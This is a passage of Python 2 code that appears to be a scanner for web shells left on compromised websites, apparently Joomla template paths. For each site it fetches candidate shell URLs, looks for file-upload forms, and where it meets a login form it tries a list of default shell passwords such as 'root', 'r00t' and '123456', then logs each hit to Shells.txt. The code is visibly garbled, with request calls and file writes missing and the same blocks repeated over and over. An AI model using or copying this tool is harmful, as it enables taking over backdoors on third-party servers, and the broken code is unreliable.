print ' -| '+site +'/ --> {}[bluestork]'.format(fg)
with open('Shells.txt', mode='a') as d:
else :
p1234 =,data=password_1234,timeout=15).content
if ' type="file"' in p1234 or ' type=\'file\'' in p1234 or ' type= "file"' in p1234 or ' type= \'file\'' in p1234 or ' type = "file"' in p1234 or ' type = \'file\'' in p1234 or ' type ="file"' in p1234 or ' type =\'file\'' in p1234 or ' type=file' in p1234 or ' type =file' in p1234 or ' type= file' in p1234 or ' type = file' in p1234 :
print ' -| '+site +'/ --> {}[bluestork]'.format(fg)
with open('Shells.txt', mode='a') as d:
else :
p12345 =,data=password_12345,timeout=15).content
if ' type="file"' in p12345 or ' type=\'file\'' in p12345 or ' type= "file"' in p12345 or ' type= \'file\'' in p12345 or ' type = "file"' in p12345 or ' type = \'file\'' in p12345 or ' type ="file"' in p12345 or ' type =\'file\'' in p12345 or ' type=file' in p12345 or ' type =file' in p12345 or ' type= file' in p12345 or ' type = file' in p12345 :
print ' -| '+site +'/ --> {}[bluestork]'.format(fg)
with open('Shells.txt', mode='a') as d:
else :
p123456 =,data=password_123456,timeout=15).content
if ' type="file"' in p123456 or ' type=\'file\'' in p123456 or ' type= "file"' in p123456 or ' type= \'file\'' in p123456 or ' type = "file"' in p123456 or ' type = \'file\'' in p123456 or ' type ="file"' in p123456 or ' type =\'file\'' in p123456 or ' type=file' in p123456 or ' type =file' in p123456 or ' type= file' in p123456 or ' type = file' in p123456 :
print ' -| '+site +'/ --> {}[bluestork]'.format(fg)
with open('Shells.txt', mode='a') as d:
else :
p123123 =,data=password_123123,timeout=15).content
if ' type="file"' in p123123 or ' type=\'file\'' in p123123 or ' type= "file"' in p123123 or ' type= \'file\'' in p123123 or ' type = "file"' in p123123 or ' type = \'file\'' in p123123 or ' type ="file"' in p123123 or ' type =\'file\'' in p123123 or ' type=file' in p123123 or ' type =file' in p123123 or ' type= file' in p123123 or ' type = file' in p123123 :
print ' -| '+site +'/ --> {}[bluestork]'.format(fg)
with open('Shells.txt', mode='a') as d:
else :
p123321 =,data=password_123321,timeout=15).content
if ' type="file"' in p123321 or ' type=\'file\'' in p123321 or ' type= "file"' in p123321 or ' type= \'file\'' in p123321 or ' type = "file"' in p123321 or ' type = \'file\'' in p123321 or ' type ="file"' in p123321 or ' type =\'file\'' in p123321 or ' type=file' in p123321 or ' type =file' in p123321 or ' type= file' in p123321 or ' type = file' in p123321 :
print ' -| '+site +'/ --> {}[bluestork]'.format(fg)
with open('Shells.txt', mode='a') as d:
else :
p123456789 =,data=password_123456789,timeout=15).content
if ' type="file"' in p123456789 or ' type=\'file\'' in p123456789 or ' type= "file"' in p123456789 or ' type= \'file\'' in p123456789 or ' type = "file"' in p123456789 or ' type = \'file\'' in p123456789 or ' type ="file"' in p123456789 or ' type =\'file\'' in p123456789 or ' type=file' in p123456789 or ' type =file' in p123456789 or ' type= file' in p123456789 or ' type = file' in p123456789 :
print ' -| '+site +'/ --> {}[bluestork]'.format(fg)
with open('Shells.txt', mode='a') as d:
else :
p1234567890 =,data=password_1234567890,timeout=15).content
if ' type="file"' in p1234567890 or ' type=\'file\'' in p1234567890 or ' type= "file"' in p1234567890 or ' type= \'file\'' in p1234567890 or ' type = "file"' in p1234567890 or ' type = \'file\'' in p1234567890 or ' type ="file"' in p1234567890 or ' type =\'file\'' in p1234567890 or ' type=file' in p1234567890 or ' type =file' in p1234567890 or ' type= file' in p1234567890 or ' type = file' in p1234567890 :
print ' -| '+site +'/ --> {}[bluestork]'.format(fg)
with open('Shells.txt', mode='a') as d:
else :
phaurgeulis =,data=password_haurgeulis,timeout=15).content
if 'Andela1C3' in phaurgeulis :
print ' -| '+site +'/ --> {}[bluestork]'.format(fg)
with open('Shells.txt', mode='a') as d:
else :
print ' -| '+site +' --> {}[Failed]'.format(fr)
else :
SH2_J_content = requests.get(SH2_J,timeout=15).content
if ' type="file"' in SH2_J_content or ' type=\'file\'' in SH2_J_content or ' type= "file"' in SH2_J_content or ' type= \'file\'' in SH2_J_content or ' type = "file"' in SH2_J_content or ' type = \'file\'' in SH2_J_content or ' type ="file"' in SH2_J_content or ' type =\'file\'' in SH2_J_content or ' type=file' in SH2_J_content or ' type =file' in SH2_J_content or ' type= file' in SH2_J_content or ' type = file' in SH2_J_content or 'Upload</a> ]</li><li>[' in SH2_J_content or 'upload</a><li><a>Sym' in SH2_J_content :
print ' -| '+site +'/ --> {}[bluestork]'.format(fg)
with open('Shells.txt', mode='a') as d:
elif ' name=pass' in SH2_J_content :
nhzgrf =,data=password_nhzgrf,timeout=15).content
if ' type="file"' in nhzgrf or ' type=\'file\'' in nhzgrf or ' type= "file"' in nhzgrf or ' type= \'file\'' in nhzgrf or ' type = "file"' in nhzgrf or ' type = \'file\'' in nhzgrf or ' type ="file"' in nhzgrf or ' type =\'file\'' in nhzgrf or ' type=file' in nhzgrf or ' type =file' in nhzgrf or ' type= file' in nhzgrf or ' type = file' in nhzgrf :
print ' -| '+site +'/ --> {}[bluestork]'.format(fg)
with open('Shells.txt', mode='a') as d:
else :
proot =,data=password_root,timeout=15).content
if ' type="file"' in proot or ' type=\'file\'' in proot or ' type= "file"' in proot or ' type= \'file\'' in proot or ' type = "file"' in proot or ' type = \'file\'' in proot or ' type ="file"' in proot or ' type =\'file\'' in proot or ' type=file' in proot or ' type =file' in proot or ' type= file' in proot or ' type = file' in proot :
print ' -| '+site +'/ --> {}[bluestork]'.format(fg)
with open('Shells.txt', mode='a') as d:
else :
pr00t =,data=password_r00t,timeout=15).content
if ' type="file"' in pr00t or ' type=\'file\'' in pr00t or ' type= "file"' in pr00t or ' type= \'file\'' in pr00t or ' type = "file"' in pr00t or ' type = \'file\'' in pr00t or ' type ="file"' in pr00t or ' type =\'file\'' in pr00t or ' type=file' in pr00t or ' type =file' in pr00t or ' type= file' in pr00t or ' type = file' in pr00t :
print ' -| '+site +'/ --> {}[bluestork]'.format(fg)
with open('Shells.txt', mode='a') as d:
else :
padmin =,data=password_admin,timeout=15).content
if ' type="file"' in padmin or ' type=\'file\'' in padmin or ' type= "file"' in padmin or ' type= \'file\'' in padmin or ' type = "file"' in padmin or ' type = \'file\'' in padmin or ' type ="file"' in padmin or ' type =\'file\'' in padmin or ' type=file' in padmin or ' type =file' in padmin or ' type= file' in padmin or ' type = file' in padmin :
print ' -| '+site +'/ --> {}[bluestork]'.format(fg)
with open('Shells.txt', mode='a') as d:
else :
pt00r =,data=password_t00r,timeout=15).content
if ' type="file"' in pt00r or ' type=\'file\'' in pt00r or ' type= "file"' in pt00r or ' type= \'file\'' in pt00r or ' type = "file"' in pt00r or ' type = \'file\'' in pt00r or ' type ="file"' in pt00r or ' type =\'file\'' in pt00r or ' type=file' in pt00r or ' type =file' in pt00r or ' type= file' in pt00r or ' type = file' in pt00r :
print ' -| '+site +'/ --> {}[bluestork]'.format(fg)
with open('Shells.txt', mode='a') as d:
else :
p123 =,data=password_123,timeout=15).content
if ' type="file"' in p123 or ' type=\'file\'' in p123 or ' type= "file"' in p123 or ' type= \'file\'' in p123 or ' type = "file"' in p123 or ' type = \'file\'' in p123 or ' type ="file"' in p123 or ' type =\'file\'' in p123 or ' type=file' in p123 or ' type =file' in p123 or ' type= file' in p123 or ' type = file' in p123 :
print ' -| '+site +'/ --> {}[bluestork]'.format(fg)
with open('Shells.txt', mode='a') as d:
else :
p1234 =,data=password_1234,timeout=15).content
if ' type="file"' in p1234 or ' type=\'file\'' in p1234 or ' type= "file"' in p1234 or ' type= \'file\'' in p1234 or ' type = "file"' in p1234 or ' type = \'file\'' in p1234 or ' type ="file"' in p1234 or ' type =\'file\'' in p1234 or ' type=file' in p1234 or ' type =file' in p1234 or ' type= file' in p1234 or ' type = file' in p1234 :
print ' -| '+site +'/ --> {}[bluestork]'.format(fg)
with open('Shells.txt', mode='a') as d:
else :
p12345 =,data=password_12345,timeout=15).content
if ' type="file"' in p12345 or ' type=\'file\'' in p12345 or ' type= "file"' in p12345 or ' type= \'file\'' in p12345 or ' type = "file"' in p12345 or ' type = \'file\'' in p12345 or ' type ="file"' in p12345 or ' type =\'file\'' in p12345 or ' type=file' in p12345 or ' type =file' in p12345 or ' type= file' in p12345 or ' type = file' in p12345 :
print ' -| '+site +'/ --> {}[bluestork]'.format(fg)
with open('Shells.txt', mode='a') as d:
else :
p123456 =,data=password_123456,timeout=15).content
if ' type="file"' in p123456 or ' type=\'file\'' in p123456 or ' type= "file"' in p123456 or ' type= \'file\'' in p123456 or ' type = "file"' in p123456 or ' type = \'file\'' in p123456 or ' type ="file"' in p123456 or ' type =\'file\'' in p123456 or ' type=file' in p123456 or ' type =file' in p123456 or ' type= file' in p123456 or ' type = file' in p123456 :
print ' -| '+site +'/ --> {}[bluestork]'.format(fg)
with open('Shells.txt', mode='a') as d:
else :
p123123 =,data=password_123123,timeout=15).content
if ' type="file"' in p123123 or ' type=\'file\'' in p123123 or ' type= "file"' in p123123 or ' type= \'file\'' in p123123 or ' type = "file"' in p123123 or ' type = \'file\'' in p123123 or ' type ="file"' in p123123 or ' type =\'file\'' in p123123 or ' type=file' in p123123 or ' type =file' in p123123 or ' type= file' in p123123 or ' type = file' in p123123 :
print ' -| '+site +'/ --> {}[bluestork]'.format(fg)
with open('Shells.txt', mode='a') as d:
else :
p123321 =,data=password_123321,timeout=15).content
if ' type="file"' in p123321 or ' type=\'file\'' in p123321 or ' type= "file"' in p123321 or ' type= \'file\'' in p123321 or ' type = "file"' in p123321 or ' type = \'file\'' in p123321 or ' type ="file"' in p123321 or ' type =\'file\'' in p123321 or ' type=file' in p123321 or ' type =file' in p123321 or ' type= file' in p123321 or ' type = file' in p123321 :
print ' -| '+site +'/ --> {}[bluestork]'.format(fg)
with open('Shells.txt', mode='a') as d:
else :
p123456789 =,data=password_123456789,timeout=15).content
if ' type="file"' in p123456789 or ' type=\'file\'' in p123456789 or ' type= "file"' in p123456789 or ' type= \'file\'' in p123456789 or ' type = "file"' in p123456789 or ' type = \'file\'' in p123456789 or ' type ="file"' in p123456789 or ' type =\'file\'' in p123456789 or ' type=file' in p123456789 or ' type =file' in p123456789 or ' type= file' in p123456789 or ' type = file' in p123456789 :
print ' -| '+site +'/ --> {}[bluestork]'.format(fg)
with open('Shells.txt', mode='a') as d:
else :
p1234567890 =,data=password_1234567890,timeout=15).content
if ' type="file"' in p1234567890 or ' type=\'file\'' in p1234567890 or ' type= "file"' in p1234567890 or ' type= \'file\'' in p1234567890 or ' type = "file"' in p1234567890 or ' type = \'file\'' in p1234567890 or ' type ="file"' in p1234567890 or ' type =\'file\'' in p1234567890 or ' type=file' in p1234567890 or ' type =file' in p1234567890 or ' type= file' in p1234567890 or ' type = file' in p1234567890 :
print ' -| '+site +'/ --> {}[bluestork]'.format(fg)
with open('Shells.txt', mode='a') as d:
else :
phaurgeulis =,data=password_haurgeulis,timeout=15).content
if 'Andela1C3' in phaurgeulis :
print ' -| '+site +'/ --> {}[bluestork]'.format(fg)
with open('Shells.txt', mode='a') as d:
else :
print ' -| '+site +' --> {}[Failed]'.format(fr)
else :
SH3_J_content = requests.get(SH3_J,timeout=15).content
if ' type="file"' in SH3_J_content or ' type=\'file\'' in SH3_J_content or ' type= "file"' in SH3_J_content or ' type= \'file\'' in SH3_J_content or ' type = "file"' in SH3_J_content or ' type = \'file\'' in SH3_J_content or ' type ="file"' in SH3_J_content or ' type =\'file\'' in SH3_J_content or ' type=file' in SH3_J_content or ' type =file' in SH3_J_content or ' type= file' in SH3_J_content or ' type = file' in SH3_J_content or 'Upload</a> ]</li><li>[' in SH3_J_content or 'upload</a><li><a>Sym' in SH3_J_content :
print ' -| '+site +'/ --> {}[hathor]'.format(fg)
with open('Shells.txt', mode='a') as d:
elif ' name=pass' in SH3_J_content :
nhzgrf =,data=password_nhzgrf,timeout=15).content
if ' type="file"' in nhzgrf or ' type=\'file\'' in nhzgrf or ' type= "file"' in nhzgrf or ' type= \'file\'' in nhzgrf or ' type = "file"' in nhzgrf or ' type = \'file\'' in nhzgrf or ' type ="file"' in nhzgrf or ' type =\'file\'' in nhzgrf or ' type=file' in nhzgrf or ' type =file' in nhzgrf or ' type= file' in nhzgrf or ' type = file' in nhzgrf :
print ' -| '+site +'/ --> {}[hathor]'.format(fg)
with open('Shells.txt', mode='a') as d:
else :
proot =,data=password_root,timeout=15).content
if ' type="file"' in proot or ' type=\'file\'' in proot or ' type= "file"' in proot or ' type= \'file\'' in proot or ' type = "file"' in proot or ' type = \'file\'' in proot or ' type ="file"' in proot or ' type =\'file\'' in proot or ' type=file' in proot or ' type =file' in proot or ' type= file' in proot or ' type = file' in proot :
print ' -| '+site +'/ --> {}[hathor]'.format(fg)
with open('Shells.txt', mode='a') as d:
else :
pr00t =,data=password_r00t,timeout=15).content
if ' type="file"' in pr00t or ' type=\'file\'' in pr00t or ' type= "file"' in pr00t or ' type= \'file\'' in pr00t or ' type = "file"' in pr00t or ' type = \'file\'' in pr00t or ' type ="file"' in pr00t or ' type =\'file\'' in pr00t or ' type=file' in pr00t or ' type =file' in pr00t or ' type= file' in pr00t or ' type = file' in pr00t :
print ' -| '+site +'/ --> {}[hathor]'.format(fg)
with open('Shells.txt', mode='a') as d:
else :
padmin =,data=password_admin,timeout=15).content
if ' type="file"' in padmin or ' type=\'file\'' in padmin or ' type= "file"' in padmin or ' type= \'file\'' in padmin or ' type = "file"' in padmin or ' type = \'file\'' in padmin or ' type ="file"' in padmin or ' type =\'file\'' in padmin or ' type=file' in padmin or ' type =file' in padmin or ' type= file' in padmin or ' type = file' in padmin :
print ' -| '+site +'/ --> {}[hathor]'.format(fg)
with open('Shells.txt', mode='a') as d:
else :
pt00r =,data=password_t00r,timeout=15).content
if ' type="file"' in pt00r or ' type=\'file\'' in pt00r or ' type= "file"' in pt00r or ' type= \'file\'' in pt00r or ' type = "file"' in pt00r or ' type = \'file\'' in pt00r or ' type ="file"' in pt00r or ' type =\'file\'' in pt00r or ' type=file' in pt00r or ' type =file' in pt00r or ' type= file' in pt00r or ' type = file' in pt00r :
print ' -| '+site +'/ --> {}[hathor]'.format(fg)
with open('Shells.txt', mode='a') as d:
else :
p123 =,data=password_123,timeout=15).content
if ' type="file"' in p123 or ' type=\'file\'' in p123 or ' type= "file"' in p123 or ' type= \'file\'' in p123 or ' type = "file"' in p123 or ' type = \'file\'' in p123 or ' type ="file"' in p123 or ' type =\'file\'' in p123 or ' type=file' in p123 or ' type =file' in p123 or ' type= file' in p123 or ' type = file' in p123 :
print ' -| '+site +'/ --> {}[hathor]'.format(fg)
with open('Shells.txt', mode='a') as d:
else :
p1234 =,data=password_1234,timeout=15).content
if ' type="file"' in p1234 or ' type=\'file\'' in p1234 or ' type= "file"' in p1234 or ' type= \'file\'' in p1234 or ' type = "file"' in p1234 or ' type = \'file\'' in p1234 or ' type ="file"' in p1234 or ' type =\'file\'' in p1234 or ' type=file' in p1234 or ' type =file' in p1234 or ' type= file' in p1234 or ' type = file' in p1234 :
print ' -| '+site +'/ --> {}[hathor]'.format(fg)
with open('Shells.txt', mode='a') as d:
else :
p12345 =,data=password_12345,timeout=15).content
if ' type="file"' in p12345 or ' type=\'file\'' in p12345 or ' type= "file"' in p12345 or ' type= \'file\'' in p12345 or ' type = "file"' in p12345 or ' type = \'file\'' in p12345 or ' type ="file"' in p12345 or ' type =\'file\'' in p12345 or ' type=file' in p12345 or ' type =file' in p12345 or ' type= file' in p12345 or ' type = file' in p12345 :
print ' -| '+site +'/ --> {}[hathor]'.format(fg)
with open('Shells.txt', mode='a') as d:
else :
p123456 =,data=password_123456,timeout=15).content
if ' type="file"' in p123456 or ' type=\'file\'' in p123456 or ' type= "file"' in p123456 or ' type= \'file\'' in p123456 or ' type = "file"' in p123456 or ' type = \'file\'' in p123456 or ' type ="file"' in p123456 or ' type =\'file\'' in p123456 or ' type=file' in p123456 or ' type =file' in p123456 or ' type= file' in p123456 or ' type = file' in p123456 :
print ' -| '+site +'/ --> {}[hathor]'.format(fg)
with open('Shells.txt', mode='a') as d:
else :
p123123 =,data=password_123123,timeout=15).content
if ' type="file"' in p123123 or ' type=\'file\'' in p123123 or ' type= "file"' in p123123 or ' type= \'file\'' in p123123 or ' type = "file"' in p123123 or ' type = \'file\'' in p123123 or ' type ="file"' in p123123 or ' type =\'file\'' in p123123 or ' type=file' in p123123 or ' type =file' in p123123 or ' type= file' in p123123 or ' type = file' in p123123 :
print ' -| '+site +'/ --> {}[hathor]'.format(fg)
with open('Shells.txt', mode='a') as d:
else :
p123321 =,data=password_123321,timeout=15).content
if ' type="file"' in p123321 or ' type=\'file\'' in p123321 or ' type= "file"' in p123321 or ' type= \'file\'' in p123321 or ' type = "file"' in p123321 or ' type = \'file\'' in p123321 or ' type ="file"' in p123321 or ' type =\'file\'' in p123321 or ' type=file' in p123321 or ' type =file' in p123321 or ' type= file' in p123321 or ' type = file' in p123321 :
print ' -| '+site +'/ --> {}[hathor]'.format(fg)
with open('Shells.txt', mode='a') as d:
else :
p123456789 =,data=password_123456789,timeout=15).content
if ' type="file"' in p123456789 or ' type=\'file\'' in p123456789 or ' type= "file"' in p123456789 or ' type= \'file\'' in p123456789 or ' type = "file"' in p123456789 or ' type = \'file\'' in p123456789 or ' type ="file"' in p123456789 or ' type =\'file\'' in p123456789 or ' type=file' in p123456789 or ' type =file' in p123456789 or ' type= file' in p123456789 or ' type = file' in p123456789 :
print ' -| '+site +'/ --> {}[hathor]'.format(fg)
with open('Shells.txt', mode='a') as d:
else :
p1234567890 =,data=password_1234567890,timeout=15).content
if ' type="file"' in p1234567890 or ' type=\'file\'' in p1234567890 or ' type= "file"' in p1234567890 or ' type= \'file\'' in p1234567890 or ' type = "file"' in p1234567890 or ' type = \'file\'' in p1234567890 or ' type ="file"' in p1234567890 or ' type =\'file\'' in p1234567890 or ' type=file' in p1234567890 or ' type =file' in p1234567890 or ' type= file' in p1234567890 or ' type = file' in p1234567890 :
print ' -| '+site +'/ --> {}[hathor]'.format(fg)
with open('Shells.txt', mode='a') as d:
else :
phaurgeulis =,data=password_haurgeulis,timeout=15).content
if 'Andela1C3' in phaurgeulis :
print ' -| '+site +'/ --> {}[hathor]'.format(fg)
with open('Shells.txt', mode='a') as d:
else :
print ' -| '+site +' --> {}[Failed]'.format(fr)
else :
SH4_J_content = requests.get(SH4_J,timeout=15).content
if ' type="file"' in SH4_J_content or ' type=\'file\'' in SH4_J_content or ' type= "file"' in SH4_J_content or ' type= \'file\'' in SH4_J_content or ' type = "file"' in SH4_J_content or ' type = \'file\'' in SH4_J_content or ' type ="file"' in SH4_J_content or ' type =\'file\'' in SH4_J_content or ' type=file' in SH4_J_content or ' type =file' in SH4_J_content or ' type= file' in SH4_J_content or ' type = file' in SH4_J_content or 'Upload</a> ]</li><li>[' in SH4_J_content or 'upload</a><li><a>Sym' in SH4_J_content :
print ' -| '+site +'/ --> {}[hathor]'.format(fg)
with open('Shells.txt', mode='a') as d:
elif ' name=pass' in SH4_J_content :
nhzgrf =,data=password_nhzgrf,timeout=15).content
if ' type="file"' in nhzgrf or ' type=\'file\'' in nhzgrf or ' type= "file"' in nhzgrf or ' type= \'file\'' in nhzgrf or ' type = "file"' in nhzgrf or ' type = \'file\'' in nhzgrf or ' type ="file"' in nhzgrf or ' type =\'file\'' in nhzgrf or ' type=file' in nhzgrf or ' type =file' in nhzgrf or ' type= file' in nhzgrf or ' type = file' in nhzgrf :
print ' -| '+site +'/ --> {}[hathor]'.format(fg)
with open('Shells.txt', mode='a') as d:
else :
proot =,data=password_root,timeout=15).content
if ' type="file"' in proot or ' type=\'file\'' in proot or ' type= "file"' in proot or ' type= \'file\'' in proot or ' type = "file"' in proot or ' type = \'file\'' in proot or ' type ="file"' in proot or ' type =\'file\'' in proot or ' type=file' in proot or ' type =file' in proot or ' type= file' in proot or ' type = file' in proot :
print ' -| '+site +'/ --> {}[hathor]'.format(fg)
with open('Shells.txt', mode='a') as d:
else :
pr00t =,data=password_r00t,timeout=15).content
if ' type="file"' in pr00t or ' type=\'file\'' in pr00t or ' type= "file"' in pr00t or ' type= \'file\'' in pr00t or ' type = "file"' in pr00t or ' type = \'file\'' in pr00t or ' type ="file"' in pr00t or ' type =\'file\'' in pr00t or ' type=file' in pr00t or ' type =file' in pr00t or ' type= file' in pr00t or ' type = file' in pr00t :
print ' -| '+site +'/ --> {}[hathor]'.format(fg)
with open('Shells.txt', mode='a') as d:
else :
padmin =,data=password_admin,timeout=15).content
if ' type="file"' in padmin or ' type=\'file\'' in padmin or ' type= "file"' in padmin or ' type= \'file\'' in padmin or ' type = "file"' in padmin or ' type = \'file\'' in padmin or ' type ="file"' in padmin or ' type =\'file\'' in padmin or ' type=file' in padmin or ' type =file' in padmin or ' type= file' in padmin or ' type = file' in padmin :
print ' -| '+site +'/ --> {}[hathor]'.format(fg)
with open('Shells.txt', mode='a') as d:
else :
pt00r =,data=password_t00r,timeout=15).content
if ' type="file"' in pt00r or ' type=\'file\'' in pt00r or ' type= "file"' in pt00r or ' type= \'file\'' in pt00r or ' type = "file"' in pt00r or ' type = \'file\'' in pt00r or ' type ="file"' in pt00r or ' type =\'file\'' in pt00r or ' type=file' in pt00r or ' type =file' in pt00r or ' type= file' in pt00r or ' type = file' in pt00r :
print ' -| '+site +'/ --> {}[hathor]'.format(fg)
with open('Shells.txt', mode='a') as d:
else :
p123 =,data=password_123,timeout=15).content
if ' type="file"' in p123 or ' type=\'file\'' in p123 or ' type= "file"' in p123 or ' type= \'file\'' in p123 or ' type = "file"' in p123 or ' type = \'file\'' in p123 or ' type ="file"' in p123 or ' type =\'file\'' in p123 or ' type=file' in p123 or ' type =file' in p123 or ' type= file' in p123 or ' type = file' in p123 :
print ' -| '+site +'/ --> {}[hathor]'.format(fg)
with open('Shells.txt', mode='a') as d:
else :
p1234 =,data=password_1234,timeout=15).content
if ' type="file"' in p1234 or ' type=\'file\'' in p1234 or ' type= "file"' in p1234 or ' type= \'file\'' in p1234 or ' type = "file"' in p1234 or ' type = \'file\'' in p1234 or ' type ="file"' in p1234 or ' type =\'file\'' in p1234 or ' type=file' in p1234 or ' type =file' in p1234 or ' type= file' in p1234 or ' type = file' in p1234 :
print ' -| '+site +'/ --> {}[hathor]'.format(fg)
with open('Shells.txt', mode='a') as d:
else :
p12345 =,data=password_12345,timeout=15).content
if ' type="file"' in p12345 or ' type=\'file\'' in p12345 or ' type= "file"' in p12345 or ' type= \'file\'' in p12345 or ' type = "file"' in p12345 or ' type = \'file\'' in p12345 or ' type ="file"' in p12345 or ' type =\'file\'' in p12345 or ' type=file' in p12345 or ' type =file' in p12345 or ' type= file' in p12345 or ' type = file' in p12345 :
print ' -| '+site +'/ --> {}[hathor]'.format(fg)
with open('Shells.txt', mode='a') as d:
else :
p123456 =,data=password_123456,timeout=15).content
if ' type="file"' in p123456 or ' type=\'file\'' in p123456 or ' type= "file"' in p123456 or ' type= \'file\'' in p123456 or ' type = "file"' in p123456 or ' type = \'file\'' in p123456 or ' type ="file"' in p123456 or ' type =\'file\'' in p123456 or ' type=file' in p123456 or ' type =file' in p123456 or ' type= file' in p123456 or ' type = file' in p123456 :
print ' -| '+site +'/ --> {}[hathor]'.format(fg)
with open('Shells.txt', mode='a') as d:
else :
p123123 =,data=password_123123,timeout=15).content
if ' type="file"' in p123123 or ' type=\'file\'' in p123123 or ' type= "file"' in p123123 or ' type= \'file\'' in p123123 or ' type = "file"' in p123123 or ' type = \'file\'' in p123123 or ' type ="file"' in p123123 or ' type =\'file\'' in p123123 or ' type=file' in p123123 or ' type =file' in p123123 or ' type= file' in p123123 or ' type = file' in p123123 :
print ' -| '+site +'/ --> {}[hathor]'.format(fg)
with open('Shells.txt', mode='a') as d:
else :
p123321 =,data=password_123321,timeout=15).content
if ' type="file"' in p123321 or ' type=\'file\'' in p123321 or ' type= "file"' in p123321 or ' type= \'file\'' in p123321 or ' type = "file"' in p123321 or ' type = \'file\'' in p123321 or ' type ="file"' in p123321 or ' type =\'file\'' in p123321 or ' type=file' in p123321 or ' type =file' in p123321 or ' type= file' in p123321 or ' type = file' in p123321 :
print ' -| '+site +'/ --> {}[hathor]'.format(fg)
with open('Shells.txt', mode='a') as d:
else :
p123456789 =,data=password_123456789,timeout=15).content
if ' type="file"' in p123456789 or ' type=\'file\'' in p123456789 or ' type= "file"' in p123456789 or ' type= \'file\'' in p123456789 or ' type = "file"' in p123456789 or ' type = \'file\'' in p123456789 or ' type ="file"' in p123456789 or ' type =\'file\'' in p123456789 or ' type=file' in p123456789 or ' type =file' in p123456789 or ' type= file' in p123456789 or ' type = file' in p123456789 :
print ' -| '+site +'/ --> {}[hathor]'.format(fg)
with open('Shells.txt', mode='a') as d:
else :
p1234567890 =,data=password_1234567890,timeout=15).content
if ' type="file"' in p1234567890 or ' type=\'file\'' in p1234567890 or ' type= "file"' in p1234567890 or ' type= \'file\'' in p1234567890 or ' type = "file"' in p1234567890 or ' type = \'file\'' in p1234567890 or ' type ="file"' in p1234567890 or ' type =\'file\'' in p1234567890 or ' type=file' in p1234567890 or ' type =file' in p1234567890 or ' type= file' in p1234567890 or ' type = file' in p1234567890 :
print ' -| '+site +'/ --> {}[hathor]'.format(fg)
with open('Shells.txt', mode='a') as d:
else :
phaurgeulis =,data=password_haurgeulis,timeout=15).content
if 'Andela1C3' in phaurgeulis :
print ' -| '+site +'/ --> {}[hathor]'.format(fg)
with open('Shells.txt', mode='a') as d:
else :
print ' -| '+site +' --> {}[Failed]'.format(fr)
else :
SH5_J_content = requests.get(SH5_J,timeout=15).content
if ' type="file"' in SH5_J_content or ' type=\'file\'' in SH5_J_content or ' type= "file"' in SH5_J_content or ' type= \'file\'' in SH5_J_content or ' type = "file"' in SH5_J_content or ' type = \'file\'' in SH5_J_content or ' type ="file"' in SH5_J_content or ' type =\'file\'' in SH5_J_content or ' type=file' in SH5_J_content or ' type =file' in SH5_J_content or ' type= file' in SH5_J_content or ' type = file' in SH5_J_content or 'Upload</a> ]</li><li>[' in SH5_J_content or 'upload</a><li><a>Sym' in SH5_J_content :
print ' -| '+site +'/ --> {}[isis]'.format(fg)
with open('Shells.txt', mode='a') as d:
elif ' name=pass' in SH5_J_content :
nhzgrf =,data=password_nhzgrf,timeout=15).content
if ' type="file"' in nhzgrf or ' type=\'file\'' in nhzgrf or ' type= "file"' in nhzgrf or ' type= \'file\'' in nhzgrf or ' type = "file"' in nhzgrf or ' type = \'file\'' in nhzgrf or ' type ="file"' in nhzgrf or ' type =\'file\'' in nhzgrf or ' type=file' in nhzgrf or ' type =file' in nhzgrf or ' type= file' in nhzgrf or ' type = file' in nhzgrf :
print ' -| '+site +'/ --> {}[isis]'.format(fg)
with open('Shells.txt', mode='a') as d:
else :
proot =,data=password_root,timeout=15).content
if ' type="file"' in proot or ' type=\'file\'' in proot or ' type= "file"' in proot or ' type= \'file\'' in proot or ' type = "file"' in proot or ' type = \'file\'' in proot or ' type ="file"' in proot or ' type =\'file\'' in proot or ' type=file' in proot or ' type =file' in proot or ' type= file' in proot or ' type = file' in proot :
print ' -| '+site +'/ --> {}[isis]'.format(fg)
with open('Shells.txt', mode='a') as d:
else :
pr00t =,data=password_r00t,timeout=15).content
if ' type="file"' in pr00t or ' type=\'file\'' in pr00t or ' type= "file"' in pr00t or ' type= \'file\'' in pr00t or ' type = "file"' in pr00t or ' type = \'file\'' in pr00t or ' type ="file"' in pr00t or ' type =\'file\'' in pr00t or ' type=file' in pr00t or ' type =file' in pr00t or ' type= file' in pr00t or ' type = file' in pr00t :
print ' -| '+site +'/ --> {}[isis]'.format(fg)
with open('Shells.txt', mode='a') as d:
else :
padmin =,data=password_admin,timeout=15).content
if ' type="file"' in padmin or ' type=\'file\'' in padmin or ' type= "file"' in padmin or ' type= \'file\'' in padmin or ' type = "file"' in padmin or ' type = \'file\'' in padmin or ' type ="file"' in padmin or ' type =\'file\'' in padmin or ' type=file' in padmin or ' type =file' in padmin or ' type= file' in padmin or ' type = file' in padmin :
print ' -| '+site +'/ --> {}[isis]'.format(fg)
with open('Shells.txt', mode='a') as d:
else :
pt00r =,data=password_t00r,timeout=15).content
if ' type="file"' in pt00r or ' type=\'file\'' in pt00r or ' type= "file"' in pt00r or ' type= \'file\'' in pt00r or ' type = "file"' in pt00r or ' type = \'file\'' in pt00r or ' type ="file"' in pt00r or ' type =\'file\'' in pt00r or ' type=file' in pt00r or ' type =file' in pt00r or ' type= file' in pt00r or ' type = file' in pt00r :
print ' -| '+site +'/ --> {}[isis]'.format(fg)
with open('Shells.txt', mode='a') as d:
else :
p123 =,data=password_123,timeout=15).content
if ' type="file"' in p123 or ' type=\'file\'' in p123 or ' type= "file"' in p123 or ' type= \'file\'' in p123 or ' type = "file"' in p123 or ' type = \'file\'' in p123 or ' type ="file"' in p123 or ' type =\'file\'' in p123 or ' type=file' in p123 or ' type =file' in p123 or ' type= file' in p123 or ' type = file' in p123 :
print ' -| '+site +'/ --> {}[isis]'.format(fg)
with open('Shells.txt', mode='a') as d:
else :
p1234 =,data=password_1234,timeout=15).content
if ' type="file"' in p1234 or ' type=\'file\'' in p1234 or ' type= "file"' in p1234 or ' type= \'file\'' in p1234 or ' type = "file"' in p1234 or ' type = \'file\'' in p1234 or ' type ="file"' in p1234 or ' type =\'file\'' in p1234 or ' type=file' in p1234 or ' type =file' in p1234 or ' type= file' in p1234 or ' type = file' in p1234 :
print ' -| '+site +'/ --> {}[isis]'.format(fg)
with open('Shells.txt', mode='a') as d:
else :
p12345 =,data=password_12345,timeout=15).content
